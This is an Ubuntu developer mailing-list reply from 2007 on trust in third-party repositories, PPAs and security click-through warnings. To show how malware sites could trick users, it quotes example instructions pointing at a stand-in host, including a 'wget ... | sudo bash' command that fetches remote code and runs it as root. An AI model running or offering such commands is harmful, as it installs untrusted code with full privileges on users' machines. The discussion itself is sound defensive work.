Untrusted software and security click-through warnings

Fri Sep 28 20:14:48 BST 2007

Hi,

I, too, agree with most of what you're saying.  Besides my own worries,
I have noted at least one bug[1] asking for the same.

[1] https://launchpad.net/bugs/139227

On Fri, Sep 28, 2007 at 03:56:31PM +0100, Ian Jackson wrote:
>  * Yes, click-through addition of PPAs whose uploaders we bless
>     and for which someone will provide security support

It seems that some knowledge of who owns a PPA should factor into the key
management for that PPA.  For example, someone who isn't MOTU shouldn't
get automatic installation of packages onto users' systems from "main".

> We can't stop third parties writing on their website
> 
>   "Now go to   Settings / Advanced / Trusted Software Sources
>    and select   Add Absolute URL
>    and paste in   http://malware.example.com/ubuntu/
>    say `confirm' to the security warning and enter your pasword"

As I understand it, this is already how many 3rd party repositories are
getting added to people's systems.  It's commonly recommended in many
(3rd party) guides about using Ubuntu.  I'm not sure the average user
would find it "surprising".

>   "Select  Applications / Accessories / Terminal
>    In the window type
>      sudo apt-add-untrusted-repository --force-security-override http://malware.example.com/ubuntu/
>    and type in your password when prompted."
> 
> but even a naive user can be expected to smell a rat there.

Right, that sort of language might help, but dedicated 3rd parties that
don't want to get involved in the Ubuntu development community will
still find ways to bypass it:

   "Select  Applications / Accessories / Terminal
    In the window type
      wget -O - http://malware.example.com/happy-goodness | sudo bash
    and type in your password when prompted."

I'm hoping the simple lack of click-through installations will be a
strong enough deterrent.

> But the alternative is that in 5 years' time our users' systems will
> be malware-infested nightmares.

I think we need to separate the discussion of "3rd Party Applications"
and "Malware".  While Malware is technically 3PA, I think there is a
technical and philosophical difference between the two, in that most
3PAs are making software to help a subset of users, and Malware to take
advantage of a subset of users.  There is, obviously, a continuum:

- Ubuntu repository software (QC'd via Debian & ubuntu-*dev, Safe, Free)
- PPA repository software (less QC, less Safe, contractually Free)
- 3PA repository software (lesser QC, less Safe, unknown Freedom)
- 3PA non-repository software (least QC, unsafe, non-Free)
- Malware (no QC, dangerous, non-Free)

I don't think there is much difference between the PPA repo and 3PA
repo -- in both situations, the person providing the software is
attempting to make it available in an "easy" way for the end-user.  I think
key management can be the way to make the PPAs stand out here.

Another reason to split the 3PA from Malware is that while the 3PA
folks may have (inappropriate) instructions on their website, Malware
is going to use method possible to get installed -- they're not going to
follow any rules or systems we create.  So, there are two things needed
(though I do recognize they overlap): "guide 3PA into the right place",
"stop Malware".

I'm curious if it might help to create some kind of "rms"-like (or
"tripwire"-like) tool that yells about executables not belonging to a
package from a known-good repository.  Of course it wouldn't easily stop
things like evil Firefox extensions.

> Or to put it another way: the point of Ubuntu is to give users control
> over their own computers - that is, Freedom.  Our job includes
> defending that control against those who would risk it in the name of
> temporary convenience.

Agreed.

-Kees

-- 
Kees Cook
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: Digital signature
Url : https://lists.ubuntu.com/archives/ubuntu-devel/attachments/20070928/dddf5bde/attachment.pgp 